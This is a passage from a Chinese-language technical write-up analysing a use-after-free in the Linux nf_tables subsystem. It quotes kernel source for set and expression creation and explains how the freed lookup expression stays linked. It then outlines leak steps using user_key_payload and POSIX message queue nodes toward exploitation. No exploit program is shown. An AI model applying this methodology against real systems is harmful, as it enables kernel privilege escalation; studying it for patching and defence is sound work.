list_add_tail_rcu(&rule->list, &old_rule->list);
else
list_add_rcu(&rule->list, &chain->rules);
}
}
kvfree(info);
chain->use++;

if (net->nft.validate_state == NFT_VALIDATE_DO)
return nft_table_validate(net, table);

return 0;
err2:
nf_tables_rule_release(&ctx, rule);
err1:
for (i = 0; i < n; i++) {
if (info[i].ops) {
module_put(info[i].ops->type->owner);
if (info[i].ops->type->release_ops)
info[i].ops->type->release_ops(info[i].ops);
}
}
kvfree(info);
return err;
}

首先前两步就是获取tablechain,若是设置了nla[NFTA_RULE_EXPRESSIONS]则遍历所有的expression的大小,并赋值给size。若是设置了nla[NFTA_RULE_USERDATA]则是把userdata的大小放到usize中。

rule = kzalloc(sizeof(*rule) + size + usize, GFP_KERNEL);随即调用这条语句分配rule,紧接着就是一系列初始化。

创建expression操作

创建expression的操作其实也是发生在nf_tables_newrule函数中的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
if (nla[NFTA_RULE_EXPRESSIONS]) {
info = kvmalloc_array(NFT_RULE_MAXEXPRS,
sizeof(struct nft_expr_info),
GFP_KERNEL);
if (!info)
return -ENOMEM;

nla_for_each_nested(tmp, nla[NFTA_RULE_EXPRESSIONS], rem) {
err = -EINVAL;
if (nla_type(tmp) != NFTA_LIST_ELEM)
goto err1;
if (n == NFT_RULE_MAXEXPRS)
goto err1;
err = nf_tables_expr_parse(&ctx, tmp, &info[n]);
if (err < 0)
goto err1;
size += info[n].ops->size;
n++;
}
}

首先是在这里通过nf_tables_expr_parse初始化info为某个type的ops。

1
2
3
4
5
6
7
8
9
10
11
12
static const struct nft_expr_type *__nft_expr_type_get(u8 family,
struct nlattr *nla)
{
const struct nft_expr_type *type;

list_for_each_entry(type, &nf_tables_expressions, list) {
if (!nla_strcmp(nla, type->name) &&
(!type->family || type->family == family))
return type;
}
return NULL;
}

nf_tables_expr_parse最终会调用到__nft_expr_type_get随后遍历nf_tables_expressions,找到对应的type

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
enum {
NFPROTO_UNSPEC = 0,
NFPROTO_INET = 1,
NFPROTO_IPV4 = 2,
NFPROTO_ARP = 3,
NFPROTO_NETDEV = 5,
NFPROTO_BRIDGE = 7,
NFPROTO_IPV6 = 10,
NFPROTO_DECNET = 12,
NFPROTO_NUMPROTO,
};

static struct nft_expr_type *nft_basic_types[] = {
&nft_imm_type,
&nft_cmp_type,
&nft_lookup_type,
&nft_bitwise_type,
&nft_byteorder_type,
&nft_payload_type,
&nft_dynset_type,
&nft_range_type,
&nft_meta_type,
&nft_rt_type,
&nft_exthdr_type,
&nft_last_type,
};

所以根据上面的例子看,这里会调用到的是nft_lookup_type

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static const struct nft_expr_ops nft_lookup_ops = {
.type = &nft_lookup_type,
.size = NFT_EXPR_SIZE(sizeof(struct nft_lookup)),
.eval = nft_lookup_eval,
.init = nft_lookup_init,
.activate = nft_lookup_activate,
.deactivate = nft_lookup_deactivate,
.destroy = nft_lookup_destroy,
.dump = nft_lookup_dump,
.validate = nft_lookup_validate,
};

struct nft_expr_type nft_lookup_type __read_mostly = {
.name = "lookup",
.ops = &nft_lookup_ops,
.policy = nft_lookup_policy,
.maxattr = NFTA_LOOKUP_MAX,
.owner = THIS_MODULE,
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static int nf_tables_newexpr(const struct nft_ctx *ctx,
const struct nft_expr_info *info,
struct nft_expr *expr)
{
const struct nft_expr_ops *ops = info->ops;
int err;

expr->ops = ops;
if (ops->init) {
err = ops->init(ctx, expr, (const struct nlattr **)info->tb);
if (err < 0)
goto err1;
}

return 0;
err1:
expr->ops = NULL;
return err;
}

最终根据不同类型进行初始化。

漏洞分析

漏洞发生在创建set的过程中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr *const nla[])
{
u32 ktype, dtype, flags, policy, gc_int, objtype;
struct netlink_ext_ack *extack = info->extack;
u8 genmask = nft_genmask_next(info->net);
u8 family = info->nfmsg->nfgen_family;
const struct nft_set_ops *ops;
struct nft_expr *expr = NULL;
struct net *net = info->net;
struct nft_set_desc desc;
struct nft_table *table;
unsigned char *udata;
struct nft_set *set;
struct nft_ctx ctx;
size_t alloc_size;
u64 timeout;
char *name;
int err, i;
u16 udlen;
u64 size;

if (nla[NFTA_SET_TABLE] == NULL || nla[NFTA_SET_NAME] == NULL ||
nla[NFTA_SET_KEY_LEN] == NULL || nla[NFTA_SET_ID] == NULL)
return -EINVAL;

memset(&desc, 0, sizeof(desc));

ktype = NFT_DATA_VALUE;
if (nla[NFTA_SET_KEY_TYPE] != NULL) {
ktype = ntohl(nla_get_be32(nla[NFTA_SET_KEY_TYPE]));
if ((ktype & NFT_DATA_RESERVED_MASK) == NFT_DATA_RESERVED_MASK)
return -EINVAL;
}

desc.klen = ntohl(nla_get_be32(nla[NFTA_SET_KEY_LEN]));
if (desc.klen == 0 || desc.klen > NFT_DATA_VALUE_MAXLEN)
return -EINVAL;

flags = 0;
if (nla[NFTA_SET_FLAGS] != NULL) {
flags = ntohl(nla_get_be32(nla[NFTA_SET_FLAGS]));
if (flags &
~(NFT_SET_ANONYMOUS | NFT_SET_CONSTANT | NFT_SET_INTERVAL |
NFT_SET_TIMEOUT | NFT_SET_MAP | NFT_SET_EVAL |
NFT_SET_OBJECT | NFT_SET_CONCAT | NFT_SET_EXPR))
return -EOPNOTSUPP;
/* Only one of these operations is supported */
if ((flags & (NFT_SET_MAP | NFT_SET_OBJECT)) ==
(NFT_SET_MAP | NFT_SET_OBJECT))
return -EOPNOTSUPP;
if ((flags & (NFT_SET_EVAL | NFT_SET_OBJECT)) ==
(NFT_SET_EVAL | NFT_SET_OBJECT))
return -EOPNOTSUPP;
}

dtype = 0;
if (nla[NFTA_SET_DATA_TYPE] != NULL) {
if (!(flags & NFT_SET_MAP))
return -EINVAL;

dtype = ntohl(nla_get_be32(nla[NFTA_SET_DATA_TYPE]));
if ((dtype & NFT_DATA_RESERVED_MASK) ==
NFT_DATA_RESERVED_MASK &&
dtype != NFT_DATA_VERDICT)
return -EINVAL;

if (dtype != NFT_DATA_VERDICT) {
if (nla[NFTA_SET_DATA_LEN] == NULL)
return -EINVAL;
desc.dlen = ntohl(nla_get_be32(nla[NFTA_SET_DATA_LEN]));
if (desc.dlen == 0 || desc.dlen > NFT_DATA_VALUE_MAXLEN)
return -EINVAL;
} else
desc.dlen = sizeof(struct nft_verdict);
} else if (flags & NFT_SET_MAP)
return -EINVAL;

if (nla[NFTA_SET_OBJ_TYPE] != NULL) {
if (!(flags & NFT_SET_OBJECT))
return -EINVAL;

objtype = ntohl(nla_get_be32(nla[NFTA_SET_OBJ_TYPE]));
if (objtype == NFT_OBJECT_UNSPEC || objtype > NFT_OBJECT_MAX)
return -EOPNOTSUPP;
} else if (flags & NFT_SET_OBJECT)
return -EINVAL;
else
objtype = NFT_OBJECT_UNSPEC;

timeout = 0;
if (nla[NFTA_SET_TIMEOUT] != NULL) {
if (!(flags & NFT_SET_TIMEOUT))
return -EINVAL;

err = nf_msecs_to_jiffies64(nla[NFTA_SET_TIMEOUT], &timeout);
if (err)
return err;
}
gc_int = 0;
if (nla[NFTA_SET_GC_INTERVAL] != NULL) {
if (!(flags & NFT_SET_TIMEOUT))
return -EINVAL;
gc_int = ntohl(nla_get_be32(nla[NFTA_SET_GC_INTERVAL]));
}

policy = NFT_SET_POL_PERFORMANCE;
if (nla[NFTA_SET_POLICY] != NULL)
policy = ntohl(nla_get_be32(nla[NFTA_SET_POLICY]));

if (nla[NFTA_SET_DESC] != NULL) {
err = nf_tables_set_desc_parse(&desc, nla[NFTA_SET_DESC]);
if (err < 0)
return err;
}

if (nla[NFTA_SET_EXPR] || nla[NFTA_SET_EXPRESSIONS])
desc.expr = true;

table = nft_table_lookup(net, nla[NFTA_SET_TABLE], family, genmask,
NETLINK_CB(skb).portid);
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_SET_TABLE]);
return PTR_ERR(table);
}

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);

set = nft_set_lookup(table, nla[NFTA_SET_NAME], genmask);
if (IS_ERR(set)) {
if (PTR_ERR(set) != -ENOENT) {
NL_SET_BAD_ATTR(extack, nla[NFTA_SET_NAME]);
return PTR_ERR(set);
}
} else {
if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_SET_NAME]);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

return 0;
}

if (!(info->nlh->nlmsg_flags & NLM_F_CREATE))
return -ENOENT;

ops = nft_select_set_ops(&ctx, nla, &desc, policy);
if (IS_ERR(ops))
return PTR_ERR(ops);

udlen = 0;
if (nla[NFTA_SET_USERDATA])
udlen = nla_len(nla[NFTA_SET_USERDATA]);

size = 0;
if (ops->privsize != NULL)
size = ops->privsize(nla, &desc);
alloc_size = sizeof(*set) + size + udlen;
if (alloc_size < size || alloc_size > INT_MAX)
return -ENOMEM;
set = kvzalloc(alloc_size, GFP_KERNEL);
if (!set)
return -ENOMEM;

name = nla_strdup(nla[NFTA_SET_NAME], GFP_KERNEL);
if (!name) {
err = -ENOMEM;
goto err_set_name;
}

err = nf_tables_set_alloc_name(&ctx, set, name);
kfree(name);
if (err < 0)
goto err_set_name;

udata = NULL;
if (udlen) {
udata = set->data + size;
nla_memcpy(udata, nla[NFTA_SET_USERDATA], udlen);
}

INIT_LIST_HEAD(&set->bindings);
INIT_LIST_HEAD(&set->catchall_list);
set->table = table;
write_pnet(&set->net, net);
set->ops = ops;
set->ktype = ktype;
set->klen = desc.klen;
set->dtype = dtype;
set->objtype = objtype;
set->dlen = desc.dlen;
set->flags = flags;
set->size = desc.size;
set->policy = policy;
set->udlen = udlen;
set->udata = udata;
set->timeout = timeout;
set->gc_int = gc_int;

set->field_count = desc.field_count;
for (i = 0; i < desc.field_count; i++)
set->field_len[i] = desc.field_len[i];

err = ops->init(set, &desc, nla);
if (err < 0)
goto err_set_init;

if (nla[NFTA_SET_EXPR]) {
expr = nft_set_elem_expr_alloc(&ctx, set, nla[NFTA_SET_EXPR]);
if (IS_ERR(expr)) {
err = PTR_ERR(expr);
goto err_set_expr_alloc;
}
set->exprs[0] = expr;
set->num_exprs++;
} else if (nla[NFTA_SET_EXPRESSIONS]) {
struct nft_expr *expr;
struct nlattr *tmp;
int left;

if (!(flags & NFT_SET_EXPR)) {
err = -EINVAL;
goto err_set_expr_alloc;
}
i = 0;
nla_for_each_nested (tmp, nla[NFTA_SET_EXPRESSIONS], left) {
if (i == NFT_SET_EXPR_MAX) {
err = -E2BIG;
goto err_set_expr_alloc;
}
if (nla_type(tmp) != NFTA_LIST_ELEM) {
err = -EINVAL;
goto err_set_expr_alloc;
}
expr = nft_set_elem_expr_alloc(&ctx, set, tmp);
if (IS_ERR(expr)) {
err = PTR_ERR(expr);
goto err_set_expr_alloc;
}
set->exprs[i++] = expr;
set->num_exprs++;
}
}

set->handle = nf_tables_alloc_handle(table);

err = nft_trans_set_add(&ctx, NFT_MSG_NEWSET, set);
if (err < 0)
goto err_set_expr_alloc;

list_add_tail_rcu(&set->list, &table->sets);
table->use++;
return 0;

err_set_expr_alloc:
for (i = 0; i < set->num_exprs; i++)
nft_expr_destroy(&ctx, set->exprs[i]);

ops->destroy(set);
err_set_init:
kfree(set->name);
err_set_name:
kvfree(set);
return err;
}

上半部分处理set的跟漏洞关系不大,主要关注下面生成expression的过程,这里使用了nft_set_elem_expr_alloc函数进行申请。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
const struct nft_set *set,
const struct nlattr *attr)
{
struct nft_expr *expr;
int err;e

expr = nft_expr_init(ctx, attr);
if (IS_ERR(expr))
return expr;

err = -EOPNOTSUPP;
if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL))
goto err_set_elem_expr;

if (expr->ops->type->flags & NFT_EXPR_GC) {
if (set->flags & NFT_SET_TIMEOUT)
goto err_set_elem_expr;
if (!set->ops->gc_init)
goto err_set_elem_expr;
set->ops->gc_init(set);
}

return expr;

err_set_elem_expr:
nft_expr_destroy(ctx, expr);
return ERR_PTR(err);
}

在函数开头就调用了nft_expr_init进行初始化。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
const struct nlattr *nla)
{
struct nft_expr_info expr_info;
struct nft_expr *expr;
struct module *owner;
int err;

err = nf_tables_expr_parse(ctx, nla, &expr_info);
if (err < 0)
goto err_expr_parse;

err = -EOPNOTSUPP;
if (!(expr_info.ops->type->flags & NFT_EXPR_STATEFUL))
goto err_expr_stateful;

err = -ENOMEM;
expr = kzalloc(expr_info.ops->size, GFP_KERNEL);
if (expr == NULL)
goto err_expr_stateful;

err = nf_tables_newexpr(ctx, &expr_info, expr);
if (err < 0)
goto err_expr_new;

return expr;
err_expr_new:
kfree(expr);
err_expr_stateful:
owner = expr_info.ops->type->owner;
if (expr_info.ops->type->release_ops)
expr_info.ops->type->release_ops(expr_info.ops);

module_put(owner);
err_expr_parse:
return ERR_PTR(err);
}

可以看到这里就出现了我们比较熟悉的两个函数了nf_tables_expr_parsenf_tables_newexpr

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
struct nft_expr {
const struct nft_expr_ops *ops;
unsigned char data[]
__attribute__((aligned(__alignof__(u64))));
};

static inline void *nft_expr_priv(const struct nft_expr *expr)
{
return (void *)expr->data;
}

static int nft_lookup_init(const struct nft_ctx *ctx,
const struct nft_expr *expr,
const struct nlattr * const tb[])
{
struct nft_lookup *priv = nft_expr_priv(expr);
u8 genmask = nft_genmask_next(ctx->net);
struct nft_set *set;
u32 flags;
int err;

if (tb[NFTA_LOOKUP_SET] == NULL ||
tb[NFTA_LOOKUP_SREG] == NULL)
return -EINVAL;

set = nft_set_lookup_global(ctx->net, ctx->table, tb[NFTA_LOOKUP_SET],
tb[NFTA_LOOKUP_SET_ID], genmask);
if (IS_ERR(set))
return PTR_ERR(set);

err = nft_parse_register_load(tb[NFTA_LOOKUP_SREG], &priv->sreg,
set->klen);
if (err < 0)
return err;

if (tb[NFTA_LOOKUP_FLAGS]) {
flags = ntohl(nla_get_be32(tb[NFTA_LOOKUP_FLAGS]));

if (flags & ~NFT_LOOKUP_F_INV)
return -EINVAL;

if (flags & NFT_LOOKUP_F_INV) {
if (set->flags & NFT_SET_MAP)
return -EINVAL;
priv->invert = true;
}
}

if (tb[NFTA_LOOKUP_DREG] != NULL) {
if (priv->invert)
return -EINVAL;
if (!(set->flags & NFT_SET_MAP))
return -EINVAL;

err = nft_parse_register_store(ctx, tb[NFTA_LOOKUP_DREG],
&priv->dreg, NULL, set->dtype,
set->dlen);
if (err < 0)
return err;
} else if (set->flags & NFT_SET_MAP)
return -EINVAL;

priv->binding.flags = set->flags & NFT_SET_MAP;

err = nf_tables_bind_set(ctx, set, &priv->binding);
if (err < 0)
return err;

priv->set = set;
return 0;
}

按照上面的分析此时就该调用nft_lookup_init函数了,这里主要需要注意的是最后一步操作,就是将priv绑定到set上。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
  static inline void __list_add_rcu(struct list_head *new,
struct list_head *prev, struct list_head *next)
{
if (!__list_add_valid(new, prev, next))
return;

new->next = next;
new->prev = prev;
rcu_assign_pointer(list_next_rcu(prev), new);
next->prev = new;
}

static inline void list_add_tail_rcu(struct list_head *new,
struct list_head *head)
{
__list_add_rcu(new, head->prev, head);
}

struct nft_set_binding {
struct list_head list;
const struct nft_chain *chain;
u32 flags;
};

struct nft_lookup {
struct nft_set *set;
u8 sreg;
u8 dreg;
bool invert;
struct nft_set_binding binding;
};

int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
struct nft_set_binding *binding)
{
struct nft_set_binding *i;
struct nft_set_iter iter;

if (set->use == UINT_MAX)
return -EOVERFLOW;

if (!list_empty(&set->bindings) && nft_set_is_anonymous(set))
return -EBUSY;

if (binding->flags & NFT_SET_MAP) {
/* If the set is already bound to the same chain all
* jumps are already validated for that chain.
*/
list_for_each_entry (i, &set->bindings, list) {
if (i->flags & NFT_SET_MAP &&
i->chain == binding->chain)
goto bind;
}

iter.genmask = nft_genmask_next(ctx->net);
iter.skip = 0;
iter.count = 0;
iter.err = 0;
iter.fn = nf_tables_bind_check_setelem;

set->ops->walk(ctx, set, &iter);
if (!iter.err)
iter.err = nft_set_catchall_bind_check(ctx, set);

if (iter.err < 0)
return iter.err;
}
bind:
binding->chain = ctx->chain;
list_add_tail_rcu(&binding->list, &set->bindings);
nft_set_trans_bind(ctx, set);
set->use++;

return 0;
}

回到nft_set_elem_expr_alloc函数中若是我们控制走向err_set_elem_expr分支即可销毁expr

if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL))满足是会进入到err_set_elem_expr分支中,正好我们使用的type中是不存在这个东西的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
void nf_tables_destroy_set(const struct nft_ctx *ctx, struct nft_set *set)
{
if (list_empty(&set->bindings) && nft_set_is_anonymous(set))
nft_set_destroy(ctx, set);
}

static void nft_lookup_destroy(const struct nft_ctx *ctx,
const struct nft_expr *expr)
{
struct nft_lookup *priv = nft_expr_priv(expr);

nf_tables_destroy_set(ctx, priv->set);
}

static void nf_tables_expr_destroy(const struct nft_ctx *ctx,
struct nft_expr *expr)
{
const struct nft_expr_type *type = expr->ops->type;

if (expr->ops->destroy)
expr->ops->destroy(ctx, expr);
module_put(type->owner);
}

void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr)
{
nf_tables_expr_destroy(ctx, expr);
kfree(expr);
}

根据这里的调用关系可以看到,其实最终实现的就只是单单kfree了个expr,而并没有脱链之类的操作,那么此时就发生了UAF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
static const struct nft_expr_ops nft_lookup_ops = {
.type = &nft_lookup_type,
.size = NFT_EXPR_SIZE(sizeof(struct nft_lookup)),
.eval = nft_lookup_eval,
.init = nft_lookup_init,
.activate = nft_lookup_activate,
.deactivate = nft_lookup_deactivate,
.destroy = nft_lookup_destroy,
.dump = nft_lookup_dump,
.validate = nft_lookup_validate,
.reduce = nft_lookup_reduce,
};

struct nft_expr_type nft_lookup_type __read_mostly = {
.name = "lookup",
.ops = &nft_lookup_ops,
.policy = nft_lookup_policy,
.maxattr = NFTA_LOOKUP_MAX,
.owner = THIS_MODULE,
};

然而lookupexpreflag位恰好没有NFT_EXPR_STATEFUL标识位。

漏洞利用

泄漏堆地址

其实上述漏洞存在很大的局限性,在触发到UAF之后,唯一能做到的一件事就是修改(struct nft_lookup *)(expr->data)->binding->next指针指向新生成的new_expr

expr = kzalloc(expr_info.ops->size, GFP_KERNEL);在上一篇文章提到了内核内存隔离这一说,因为标识位的不同导致无法使用很多已有结构体。

1
2
3
4
5
struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[] __aligned(__alignof__(u64)); /* actual data */
};

上面next指针的偏移正好为0x18而这里的data数组是用户可控,那么可以通过触发uaf之后泄漏出堆地址。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
int user_preparse(struct key_preparsed_payload *prep)
{
struct user_key_payload *upayload;
size_t datalen = prep->datalen;

if (datalen <= 0 || datalen > 32767 || !prep->data)
return -EINVAL;

upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL);
if (!upayload)
return -ENOMEM;

/* attach the data */
prep->quotalen = datalen;
prep->payload.data[0] = upayload;
upayload->datalen = datalen;
memcpy(upayload->data, prep->data, datalen);
return 0;
}
EXPORT_SYMBOL_GPL(user_preparse);

并且可以注意到他的申请参数也为GFP_KERNEL

泄漏内核地址

这里用到的是mqueue中的posix消息队列模块,该模块和msg_msg一样是IPC进程间通信的消息队列功能。

1
2
3
4
5
6
7
8
9
10
11
struct rb_node {
unsigned long __rb_parent_color;
struct rb_node *rb_right;
struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));

struct posix_msg_tree_node {
struct rb_node rb_node;
struct list_head msg_list;
int priority;
};

可以看到posix_msg_tree_node的next指针刚好落在了0x18这个位置。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
static int do_mq_timedsend(mqd_t mqdes, const char __user *u_msg_ptr,
size_t msg_len, unsigned int msg_prio,
struct timespec64 *ts)
{
struct fd f;
struct inode *inode;
struct ext_wait_queue wait;
struct ext_wait_queue *receiver;
struct msg_msg *msg_ptr;
struct mqueue_inode_info *info;
ktime_t expires, *timeout = NULL;
struct posix_msg_tree_node *new_leaf = NULL;
int ret = 0;
DEFINE_WAKE_Q(wake_q);

// ... ...
msg_ptr = load_msg(u_msg_ptr, msg_len);

// ... ...

if (!info->node_cache)
new_leaf = kmalloc(sizeof(*new_leaf), GFP_KERNEL);

spin_lock(&info->lock);

if (!info->node_cache && new_leaf) {
/* Save our speculative allocation into the cache */
INIT_LIST_HEAD(&new_leaf->msg_list);
info->node_cache = new_leaf;
new_leaf = NULL;
} else {
kfree(new_leaf);
}
if (info->attr.mq_curmsgs == info->attr.mq_maxmsg) {
// ... ...
} else {
// ... ...
if (receiver) {
// ... ...
} else {
// ... ...
ret = msg_insert(msg_ptr, info);
}
}
// ... ...
}

SYSCALL_DEFINE5(mq_timedsend, mqd_t, mqdes, const char __user *, u_msg_ptr,
size_t, msg_len, unsigned int, msg_prio,
const struct __kernel_timespec __user *, u_abs_timeout)
{
struct timespec64 ts, *p = NULL;
if (u_abs_timeout) {
int res = prepare_timeout(u_abs_timeout, &ts);
if (res)
return res;
p = &ts;
}
return do_mq_timedsend(mqdes, u_msg_ptr, msg_len, msg_prio, p);
}

整体流程就是首先从用户态载入消息,然后创建对应的posix_msg_tree_node结构体,将结构体放入到info中,最后插入到消息队列中。可以看到在申请posix_msg_tree_node结构体时也是使用了GFP_KERNEL标识位。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
static int msg_insert(struct msg_msg *msg, struct mqueue_inode_info *info)
{
struct rb_node **p, *parent = NULL;
struct posix_msg_tree_node *leaf;
bool rightmost = true;

p = &info->msg_tree.rb_node;
while (*p) {
parent = *p;
leaf = rb_entry(parent, struct posix_msg_tree_node, rb_node);

if (likely(leaf->priority == msg->m_type))
goto insert_msg;
else if (msg->m_type < leaf->priority) {
p = &(*p)->rb_left;
rightmost = false;
} else
p = &(*p)->rb_right;
}
if (info->node_cache) {
leaf = info->node_cache;
info->node_cache = NULL;
} else {
leaf = kmalloc(sizeof(*leaf), GFP_ATOMIC);
if (!leaf)
return -ENOMEM;
INIT_LIST_HEAD(&leaf->msg_list);
}
leaf->priority = msg->m_type;

if (rightmost)
info->msg_tree_rightmost = &leaf->rb_node;

rb_link_node(&leaf->rb_node, parent, p);
rb_insert_color(&leaf->rb_node, &info->msg_tree);
insert_msg:
info->attr.mq_curmsgs++;
info->qsize += msg->m_ts;
list_add_tail(&msg->m_list, &leaf->msg_list);
return 0;
}

可以看到在最后是将消息添加到leaf中去了,并且next指针为0x18,如果出发了uaf覆盖的话就会达成以下效果

偷图侵删

那么接下来只需要读取消息即可达到泄漏的目的

1
2
3
4
5
6
7
8
9
10
11
12
13
SYSCALL_DEFINE5(mq_timedreceive, mqd_t, mqdes, char __user *, u_msg_ptr,
size_t, msg_len, unsigned int __user *, u_msg_prio,
const struct __kernel_timespec __user *, u_abs_timeout)
{
struct timespec64 ts, *p = NULL;
if (u_abs_timeout) {
int res = prepare_timeout(u_abs_timeout, &ts);
if (res)
return res;
p = &ts;
}
return do_mq_timedreceive(mqdes, u_msg_ptr, msg_len, u_msg_prio, p);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
static int do_mq_timedreceive(mqd_t mqdes, char __user *u_msg_ptr,
size_t msg_len, unsigned int __user *u_msg_prio,
struct timespec64 *ts)
{
ssize_t ret;
struct msg_msg *msg_ptr;
struct fd f;
struct inode *inode;
struct mqueue_inode_info *info;
struct ext_wait_queue wait;
ktime_t expires, *timeout = NULL;
struct posix_msg_tree_node *new_leaf = NULL;

if (ts) {
expires = timespec64_to_ktime(*ts);
timeout = &expires;
}

audit_mq_sendrecv(mqdes, msg_len, 0, ts);

f = fdget(mqdes);
if (unlikely(!f.file)) {
ret = -EBADF;
goto out;
}

inode = file_inode(f.file);
if (unlikely(f.file->f_op != &mqueue_file_operations)) {
ret = -EBADF;
goto out_fput;
}
info = MQUEUE_I(inode);
audit_file(f.file);

if (unlikely(!(f.file->f_mode & FMODE_READ))) {
ret = -EBADF;
goto out_fput;
}

/* checks if buffer is big enough */
if (unlikely(msg_len < info->attr.mq_msgsize)) {
ret = -EMSGSIZE;
goto out_fput;
}

/*
* msg_insert really wants us to have a valid, spare node struct so
* it doesn't have to kmalloc a GFP_ATOMIC allocation, but it will
* fall back to that if necessary.
*/
if (!info->node_cache)
new_leaf = kmalloc(sizeof(*new_leaf), GFP_KERNEL);

spin_lock(&info->lock);

if (!info->node_cache && new_leaf) {
/* Save our speculative allocation into the cache */
INIT_LIST_HEAD(&new_leaf->msg_list);
info->node_cache = new_leaf;
} else {
kfree(new_leaf);
}

if (info->attr.mq_curmsgs == 0) {
if (f.file->f_flags & O_NONBLOCK) {
spin_unlock(&info->lock);
ret = -EAGAIN;
} else {
wait.task = current;

/* memory barrier not required, we hold info->lock */
WRITE_ONCE(wait.state, STATE_NONE);
ret = wq_sleep(info, RECV, timeout, &wait);
msg_ptr = wait.msg;
}
} else {
DEFINE_WAKE_Q(wake_q);

msg_ptr = msg_get(info);

inode->i_atime = inode->i_mtime = inode->i_ctime =
current_time(inode);

/* There is now free space in queue. */
pipelined_receive(&wake_q, info);
spin_unlock(&info->lock);
wake_up_q(&wake_q);
ret = 0;
}
if (ret == 0) {
ret = msg_ptr->m_ts;

if ((u_msg_prio && put_user(msg_ptr->m_type, u_msg_prio)) ||
store_msg(u_msg_ptr, msg_ptr, msg_ptr->m_ts)) {
ret = -EFAULT;
}
free_msg(msg_ptr);
}
out_fput:
fdput(f);
out:
return ret;
}

首先拿到file_inode,接着通过msg_get拿到对应的msg

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
static inline struct msg_msg *msg_get(struct mqueue_inode_info *info)
{
struct rb_node *parent = NULL;
struct posix_msg_tree_node *leaf;
struct msg_msg *msg;

try_again:
/*
* During insert, low priorities go to the left and high to the
* right. On receive, we want the highest priorities first, so
* walk all the way to the right.
*/
parent = info->msg_tree_rightmost;
if (!parent) {
if (info->attr.mq_curmsgs) {
pr_warn_once("Inconsistency in POSIX message queue, "
"no tree element, but supposedly messages "
"should exist!\n");
info->attr.mq_curmsgs = 0;
}
return NULL;
}
leaf = rb_entry(parent, struct posix_msg_tree_node, rb_node);
if (unlikely(list_empty(&leaf->msg_list))) {
pr_warn_once("Inconsistency in POSIX message queue, "
"empty leaf node but we haven't implemented "
"lazy leaf delete!\n");
msg_tree_erase(leaf, info);
goto try_again;
} else {
msg = list_first_entry(&leaf->msg_list,
struct msg_msg, m_list);
list_del(&msg->m_list);
